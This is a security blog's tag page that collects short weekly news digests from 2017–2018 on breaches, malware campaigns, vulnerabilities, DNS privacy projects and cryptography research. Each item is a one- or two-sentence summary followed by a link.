Tag DNS

InfoSec Week 32, 2018

A Comcast security flaws exposed more than 26 millions of customers’ personal information. Basically, an attacker could spoof IP address using "X-forwarded-for" header on a Comcast login page and reveal the customer’s location.
https://www.buzzfeednews.com/article/nicolenguyen/a-comcast-security-flaw-exposed-millions-of-customers

According to the Check Point Research, more than 150k computers are infected with the new variant of Ramnit botnet named Black. Botnet install second stage malware with the proxy functionality.
https://research.checkpoint.com/ramnits-network-proxy-servers/

Malware infected Apple chip maker Taiwan Semiconductor Manufacturing. All of their factories were shut down last week, but they had already recovered from the attack.
https://www.bloomberg.com/news/articles/2018-08-04/tsmc-takes-emergency-steps-as-operations-hit-by-computer-virus

A flaw in the Linux kernel may cause a remote denial of service [CVE-2018-5390]. Attack require less than 2 Kbps of traffic.
https://access.redhat.com/articles/3553061

GDPR and other cookie consent scripts are used to distribute malware.
https://blog.sucuri.net/2018/08/cookie-consent-script-used-to-distribute-malware.html

Interesting blog on how criminals in Iran make money by creating Android malware apps.
https://blog.certfa.com/posts/pushiran-dl-malware-family/

Let's Encrypt root CA certificate is now trusted by all major root programs. They were dependent on a cross-signing on some systems, so this is great news!
https://letsencrypt.org/2018/08/06/trusted-by-all-major-root-programs.html

There is a really effective new attack on WPA PSK (Pre-Shared Key) passwords. Attackers can ask Access Point for the data required for offline cracking, no client traffic sniffing is needed anymore.
https://hashcat.net/forum/thread-7717.html

Innovative new research on a software implementation hardening was published with the name "Chaff Bugs: Deterring Attackers by Making Software Buggier".
The idea is simple, introduce a large number of non-exploitable bugs in the program which makes the bug discovery and exploit creation significantly harder.
https://arxiv.org/abs/1808.00659

Researchers from the University of Milan published padding oracle attack against Telegram Passport.
Don't roll your own cryptography schemes if other people depend on it...
https://pequalsnp-team.github.io/writeups/analisys_telegram_passport

A Handshake is a new experimental peer-to-peer root DNS. They have published resolver source code and have test network up and running. Looks like really promising project.
https://handshake.org/

InfoSec Week 26, 2018

A reverse shell connection is possible from an OpenVPN configuration file. So be cautious and treat ovpn files like shell scripts.
https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da

Mozilla integrates Troy Hunts' Have I Been Pwned (HIBP) database of breached passwords into Firefox. They will make breach data searchable via a new tool called Firefox Monitor.
https://www.troyhunt.com/were-baking-have-i-been-pwned-into-firefox-and-1password/

The suspected ringleader behind the well known Carbanak malware is under arrest, but of course, his malware attacks live on.
https://www.bloomberg.com/news/features/2018-06-25/the-biggest-digital-heist-in-history-isn-t-over-yet

It is possible to attack resources in the private network from the Internet with DNS rebinding attack.
"Following the wrong link could allow remote attackers to control your WiFi router, Google Home, Roku, Sonos speakers, home thermostats and more."
https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325

Wi-Fi Alliance Introduces Wi-Fi Certified WPA3 Security. Again with a questionable cryptography, but we will see. That's how industrial alliances with expensive membership works.
https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-wi-fi-certified-wpa3-security

IETF published draft of Issues and requirements for Server Name Indication (SNI) encryption in TLS.
The draft lists known attacks against SNI encryption, discusses the current "co-tenancy fronting" solution, and presents requirements for future TLS layer solutions.
https://tools.ietf.org/html/draft-ietf-tls-sni-encryption-03

The unpatched WordPress vulnerability allows code execution for authors. Exploiting the vulnerability grants an attacker the capability to delete any file of the WordPress installation or any other file the PHP process user has the proper permissions to delete.
https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

Researchers identified three attack vectors against LTE (Long-Term Evolution, basically 4G) on layer 2 - an active attack to redirect network packets, a passive identity mapping attack, and website fingerprinting based on resource allocation.
https://alter-attack.net/

Cisco Talos team releases ThanatosDecryptor, the program that attempts to decrypt certain files encrypted by the Thanatos malware.
https://github.com/Cisco-Talos/ThanatosDecryptor

DEDA is a tool that gives the possibility to read out and decode color tracking dots which encode information about the printer. It also allows anonymisation to prevent arbitrary tracking.
https://github.com/dfd-tud/deda

InfoSec Week 17, 2018

A loud sound emitted by a gas-based fire suppression system deployed in the data center has destroyed the hard drives of a Swedish data center, downing NASDAQ operations across Northern Europe.
https://www.bleepingcomputer.com/news/technology/loud-sound-from-fire-alarm-system-shuts-down-nasdaqs-scandinavian-data-center/

Signal for iOS, version 2.23.1.1 and prior, is vulnerable to the screen lock bypass (CVE-2018-9840).
The blog explains how the vulnerability can be exploited in practice.
http://nint.en.do/Signal-Bypass-Screen-locker.php

Good summary about the integrated circuits Counterfeiting, detection and avoidance methods by hardware engineer Yahya Tawil.
https://atadiat.com/en/e-introduction-counterfeit-ics-counterfeiting-detection-avoidance-methods/

A new python-based cryptocurrency mining malware PyRoMine (FortiGuard Labs) is using the ETERNALROMANCE exploit attributed to the NSA, to propagate Monero cryptocurrency miner.
https://securityboulevard.com/2018/04/python-based-malware-uses-nsa-exploit-to-propagate-monero-xmr-miner/

The Australian Bureau of Statistics tracked people by their mobile device data to enrich their collection of data.
https://medium.com/@Asher_Wolf/the-australian-bureau-of-statistics-tracked-people-by-their-mobile-device-data-and-didnt-tell-them-16df094de31

BGP hijack affected Amazon DNS and rerouted web traffic for more than two hours. Attackers used the hijack to serve fake MyEtherWallet.com cryptocurrency website.
https://doublepulsar.com/hijack-of-amazons-internet-domain-service-used-to-reroute-web-traffic-for-two-hours-unnoticed-3a6f0dda6a6f

Embedi researchers analyzed the security of a Huawei Secospace USG6330 firewall firmware. Good insight on how to analyze devices in general.
https://embedi.com/blog/first-glance-on-os-vrp-by-huawei/

The ISO has rejected SIMON and SPECK symmetric encryption algorithms designed and proposed by the NSA. They are optimized for small and low-cost processors like IoT devices.
https://www.schneier.com/blog/archives/2018/04/two_nsa_algorit.html

The Center for Information Technology Policy at Princeton Announced IoT Inspector - an ongoing initiative to study consumer IoT security and privacy.
https://freedom-to-tinker.com/2018/04/23/announcing-iot-inspector-a-tool-to-study-smart-home-iot-device-behavior/

There is a Proof of Concept for Fusée Gelée - a coldboot vulnerability that allows full, unauthenticated arbitrary code execution on NVIDIA's Tegra line of embedded processors. This vulnerability compromises the entire root-of-trust for each processor, leading to full compromise of on-device secrets where USB access is possible.
https://github.com/reswitched/fusee-launcher/blob/master/report/fusee_gelee.md

InfoSec Week 16, 2018

Google disables domain fronting capability in their App Engine, which was used to evade censorship. What a fortunate timing.
https://arstechnica.com/information-technology/2018/04/google-disables-domain-fronting-capability-used-to-evade-censors/

Bloomberg published article on how Palantir is using the War on Terror tools to track American citizens.
https://www.bloomberg.com/features/2018-palantir-peter-thiel/

Third-party javascript trackers are actively exfiltrating personal identifiers from websites which uses "login with Facebook" button and other such social login APIs.
https://freedom-to-tinker.com/2018/04/18/no-boundaries-for-facebook-data-third-party-trackers-abuse-facebook-login/

The U.S. and the UK blame Russia for a campaign of hacks into routers, switches and other connected infrastructure.
https://www.forbes.com/sites/thomasbrewster/2018/04/16/russia-accused-of-hacking-network-infrastructure/

One of the people charged for the Reveton ransomware trojan was actually working as a Microsoft network engineer.
https://www.bleepingcomputer.com/news/security/microsoft-engineer-charged-in-reveton-ransomware-case/

Intel processors now allow antivirus (mostly Microsoft right now) to Use built-in GPUs for in-memory malware scanning.
https://arstechnica.com/gadgets/2018/04/intel-microsoft-to-use-gpu-to-scan-memory-for-malware/

Avast shared CCleaner breach timeline. They were infiltrated via TeamViewer. More than 2.3 million users, 40 companies infected.
https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer

Nice blog post about the quantum resistant hash-based signature schemes. No public key cryptography.
https://blog.cryptographyengineering.com/2018/04/07/hash-based-signatures-an-illustrated-primer/

New Android P enables users to change default DNS server, it will also support DNS over TLS.
https://www.androidpolice.com/2018/04/14/google-explains-new-private-dns-setting-android-p/

There is a new web standard for authentication, designed to replace password login method with the public key cryptography and biometrics.
https://www.w3.org/TR/2018/CR-webauthn-20180320/

OpenSSL is vulnerable to a cache timing vulnerability in RSA Key Generation (CVE-2018-0737).
Could be theoretically exploited by some hypervisor, but they have decided not to release emergency fix.
https://mta.openssl.org/pipermail/openssl-announce/2018-April/000122.html

The Endgame has released Ember (Endgame Malware BEnchmark for Research), an open source collection of 1.1 million portable executable file metadata & derived features from the PE files, hashes and a benchmark model trained on those features.
https://github.com/endgameinc/ember

InfoSec Week 14, 2018

There is a critical flaw in Microsoft Malware Protection Engine (CVE-2018-0986). They have used the open source unrar code, changed all the signed ints, breaking the code. Remote SYSTEM memory corruption.
https://bugs.chromium.org/p/project-zero/issues/detail?id=1543&desc=2

Blog by Latacora about the right choices and parameters when dealing with cryptography for backups, communication, authentication, etc. Nice summary, with the explanation and historical references.
http://latacora.singles/2018/04/03/cryptographic-right-answers.html

An Italian football club Lazio has been scammed by a social engineering attack via email. The club sent out transfer bill of €2 million to a fraudster’s bank account instead of the Feyenoord Dutch club.
https://www.hackread.com/phishing-scam-italian-football-club-scammed/

The people behind the Google Wycheproof project, which is testing crypto libraries against known attacks released test vectors for many crypto primitives.
https://github.com/google/wycheproof/tree/master/testvectors

Cloudflare announced consumer DNS service sitting on a 1.1.1.1 address. Supports DNS-over-TLS, also DNS-over-HTTPS.
https://blog.cloudflare.com/announcing-1111/

Good explanatory blog about the oblivious DNS and why DNS should not require our trust at all.
https://freedom-to-tinker.com/2018/04/02/a-privacy-preserving-approach-to-dns/

There is a local privilege escalation vulnerability (CVE-2018-0492) in the Debian beep package. Yes, beep package for motherboard beeping. Escalation, because setuid + race condition.
https://mta.openssl.org/pipermail/openssl-announce/2018-March/000119.html

LibreSSL 2.7.0 was accepting all invalid host names as correct. A vulnerability was found by Python maintainer Christian Heimes when running tests after porting new LibreSSL to the Python 3.7. Nobody affected.
https://mail.python.org/pipermail/python-dev/2018-April/152624.html

VirusTotal launches a new Android Sandbox system VirusTotal Droidy to help security researchers detect malicious apps based on behavioral analysis.
http://blog.virustotal.com/2018/04/meet-virustotal-droidy-our-new-android.html

MesaLink is a new memory-safe and OpenSSL-compatible TLS library written in Rust.
https://github.com/mesalock-linux/mesalink

InfoSec Week 7, 2018

The Fidelis Cybersecurity researcher Jason Reaves demonstrated how covertly exchange data using X.509 digital certificates. The proof of concept code is using SubjectKeyIdentifier and generating certificates on the fly.
https://www.fidelissecurity.com/threatgeek/2018/02/exposing-x509-vulnerabilities

The "UDPoS" Point of Sale malware is using DNS traffic to exfiltrate stolen credit card data.
https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns

Talos analyzed malware threat targeting Olympic computer systems during the opening ceremony. The main purpose was information gathering and destroying the system.
http://blog.talosintelligence.com/2018/02/olympic-destroyer.html

Zero-day vulnerability in the Bitmessage messaging client was exploited to steal Electrum cryptocurrency wallet keys.
https://securityaffairs.co/wordpress/69100/hacking/bitmessage-zero-day.html

Trustwave analyzed multi-stage Microsoft Word attack which is NOT using macros. Really creative technique.
https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/

Microsoft can't fix Skype privilege escalation bug without the massive code rewrite, so they postponed it for a while.
http://seclists.org/fulldisclosure/2018/Feb/33

Facebook is advertising their Onavo VPN application, but there are a few reasons why it is really not a good idea to use it.
https://gizmodo.com/do-not-i-repeat-do-not-download-onavo-facebook-s-vam-1822937825

Facebook is spamming users via SMS registered for two factor authentication (2FA). Then posts their responses on a wall.
https://twitter.com/Gabriel__Lewis/status/963121814166630400

(Not only) Performance analysis of a Retpoline mitigation for Spectre vulnerability.
https://cyber.wtf/2018/02/13/in-debt-to-retpoline/

A guide on how to brutefoce Linux Full Disk Encryption (LUKS) volumes using Hashcat software.
https://blog.pnb.io/2018/02/bruteforcing-linux-full-disk-encryption.html

Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability. It is possible to silently send any files. All operating systems affected before 5.4.5/6.0.1 versions.
https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure

InfoSec Week 3, 2018

Notoriously known Necurs spam botnet is sending millions of spam emails that are pumping shitcoin cryptocurrency named Swisscoin. Attackers are probably invested and are expecting to do pump-and-dump scheme.
https://www.bleepingcomputer.com/news/cryptocurrency/worlds-largest-spam-botnet-is-pumping-and-dumping-an-obscure-cryptocurrency/

Nice article on Russia's hacking capabilities against the foreign critical infrastructure.
https://www.fastcompany.com/40515682/the-other-scary-foreign-hacking-threat-trump-is-ignoring

Taiwanese police has handed malware-infected USB sticks as prizes for cybersecurity quiz. The malware was some old sample trying to communicate with non-existing C&C server in Poland. The thumb drives were infected by third-party contractor.
https://www.theregister.co.uk/AMP/2018/01/10/taiwanese_police_malware/

New research is analyzing usage of the Certificate Authority Authorization (CAA) DNS records. CAA records enable domain owners to explicitly tell which certificate authority may issue digital certificates for their domain. Only 4 of the large DNS operators that dominate the Internet’s DNS infrastructure enabled their customers to configure CAA records, but things are getting better after this audit.
https://caastudy.github.io/

Lenovo engineers have discovered a backdoor affecting RackSwitch and BladeCenter switches running ENOS (Enterprise Network Operating System). The company already released firmware updates.
The backdoor was added to the source code in 2004 when it was maintained by Nortel.
https://www.bleepingcomputer.com/news/security/lenovo-discovers-and-removes-backdoor-in-networking-switches/

Nice technical report about PowerStager, Python / C / PowerShell malware used in the Pyeongchang Olympic themed spear phishing attack.
https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/

InfoSec Week 17, 2017

A team of researchers from New York University said they identified a severe flaw in General Electric Multilin protection relays, which are widely deployed in the US energy sector.
https://www.blackhat.com/us-17/briefings.html#and-then-the-script-kiddie-said-let-there-be-no-light.-are-cyber-attacks-on-the-power-grid-limited-to-nation-state-actors

Kaspersky labs analyzed Backdoor.Win32.Denis, malware using DNS tunneling as a communication infrastructure. Base64 is not an encryption, tough.
https://securelist.com/blog/research/78203/use-of-dns-tunneling-for-cc-communications/

Check Point researchers have discovered a new Mac malware family that uses nag screens to obtain admin privileges, Tor to hide traffic diverted to a remote proxy, and a rogue certificate to intercept encrypted browser traffic. It's spreading via email spam.
http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

A critical vulnerability (CVE 2017-5135) in the implementation of the SNMP protocol allows an attacker to take over at least 78 cable modem models.
https://www.bleepingcomputer.com/news/security/several-cable-modem-models-affected-by-snmp-god-mode-flaw/

Wired wrote about the research of Android applications that turns the smartphone into a file server, exposing open ports to the internet, and why is it dangerous. https://www.wired.com/2017/04/obscure-app-flaw-creates-backdoors-millions-smartphones/

CIAs document tracking program Scribbles allegedly embeds a web beacon-style tag into watermarks located on Microsoft Word documents that can report document analytics back to the CIA.
https://wikileaks.org/vault7/#Scribbles

The Antminer, bitcoin mining hardware, has a backdoor that can disable miner remotely. http://www.antbleed.com/ https://www.reddit.com/r/Bitcoin/comments/67qwqv/antbleed_exposing_the_malicious_backdoor_on/dgsk6cf/

Troy Hunt published blog about some of the most insane password reset schemes, security questions, and corporate responses he saw through the career.
https://www.troyhunt.com/reckon-youve-seen-some-stupid-security-things-here-hold-my-beer/